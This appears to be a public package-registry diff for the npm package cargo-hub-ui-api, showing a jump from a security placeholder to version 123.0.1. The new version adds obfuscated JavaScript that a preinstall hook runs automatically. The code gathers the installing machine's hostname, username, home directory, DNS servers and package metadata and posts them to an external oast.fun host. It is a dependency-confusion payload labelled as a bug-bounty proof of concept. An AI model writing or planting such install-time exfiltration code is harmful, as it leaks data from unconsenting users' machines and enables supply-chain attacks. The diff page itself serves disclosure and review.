cargo-hub-ui-api 0.0.1-security → 123.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of cargo-hub-ui-api might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function _0x3155(){const _0xdc6e2f=['getServers','error','hostname','2928457uqlZvU','homedir','data','dns','name','5271264QcXWDB','10jyygWt','1055604IiIApu','stringify','30GnOOOU','version','userInfo','860172faofvj','request','179256oyJZrx','write','./package.json','___resolved','158DpBFoi','stdout','https','32631HQfCxP','end','22986WhsGfi'];_0x3155=function(){return _0xdc6e2f;};return _0x3155();}const _0x568ed7=_0x4a85;(function(_0x39ee5b,_0x456a05){const _0x34442f=_0x4a85,_0x200b10=_0x39ee5b();while(!![]){try{const _0x46c988=-parseInt(_0x34442f(0x146))/0x1+parseInt(_0x34442f(0x141))/0x2*(-parseInt(_0x34442f(0x144))/0x3)+parseInt(_0x34442f(0x13b))/0x4*(-parseInt(_0x34442f(0x135))/0x5)+-parseInt(_0x34442f(0x136))/0x6+parseInt(_0x34442f(0x14a))/0x7+-parseInt(_0x34442f(0x13d))/0x8+parseInt(_0x34442f(0x134))/0x9*(parseInt(_0x34442f(0x138))/0xa);if(_0x46c988===_0x456a05)break;else _0x200b10['push'](_0x200b10['shift']());}catch(_0x597465){_0x200b10['push'](_0x200b10['shift']());}}}(_0x3155,0xa24a7));const os=require('os'),dns=require(_0x568ed7(0x132)),querystring=require('querystring'),https=require(_0x568ed7(0x143)),packageJSON=require(_0x568ed7(0x13f)),package=packageJSON[_0x568ed7(0x133)],trackingData=JSON[_0x568ed7(0x137)]({'p':package,'c':__dirname,'hd':os[_0x568ed7(0x130)](),'hn':os[_0x568ed7(0x149)](),'un':os[_0x568ed7(0x13a)]()['username'],'dns':dns[_0x568ed7(0x147)](),'r':packageJSON[_0x568ed7(0x140)],'v':packageJSON[_0x568ed7(0x139)],'pjson':packageJSON}),postData=querystring[_0x568ed7(0x137)]({'msg':trackingData}),options={'hostname':'zpniztomtitltodxjeqzylllz4kndi51n.oast.fun','port':0x1bb,'path':'/','method':'POST','headers':{'Content-Type':'application/x-www-form-urlencoded','Content-Length':postData['length']}},req=https[_0x568ed7(0x13c)](options,_0x515ce3=>{const _0x5027f4=_0x568ed7;_0x515ce3['on'](_0x5027f4(0x131),_0x608996=>{const _0x5da248=_0x5027f4;process[_0x5da248(0x142)][_0x5da248(0x13e)](_0x608996);});});function _0x4a85(_0x1916c0,_0x5a33c3){const _0x3155a8=_0x3155();return _0x4a85=function(_0x4a8505,_0x3a58eb){_0x4a8505=_0x4a8505-0x130;let _0xd23e9c=_0x3155a8[_0x4a8505];return _0xd23e9c;},_0x4a85(_0x1916c0,_0x5a33c3);}req['on'](_0x568ed7(0x148),_0x8eadc0=>{const _0x403311=_0x568ed7;console[_0x403311(0x148)](_0x8eadc0);}),req[_0x568ed7(0x13e)](postData),req[_0x568ed7(0x145)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "cargo-hub-ui-api",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "123.0.1",
|
|
4
|
+
"description": "This package is a Proof of concept made by h0udini for the a bug bounty program. Its only function is to confirm installation on company machines, the code is not malicious in any way and will be deleted after getting the necessary POC.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "h0udini@intigriti.me",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=cargo-hub-ui-api for more information.
|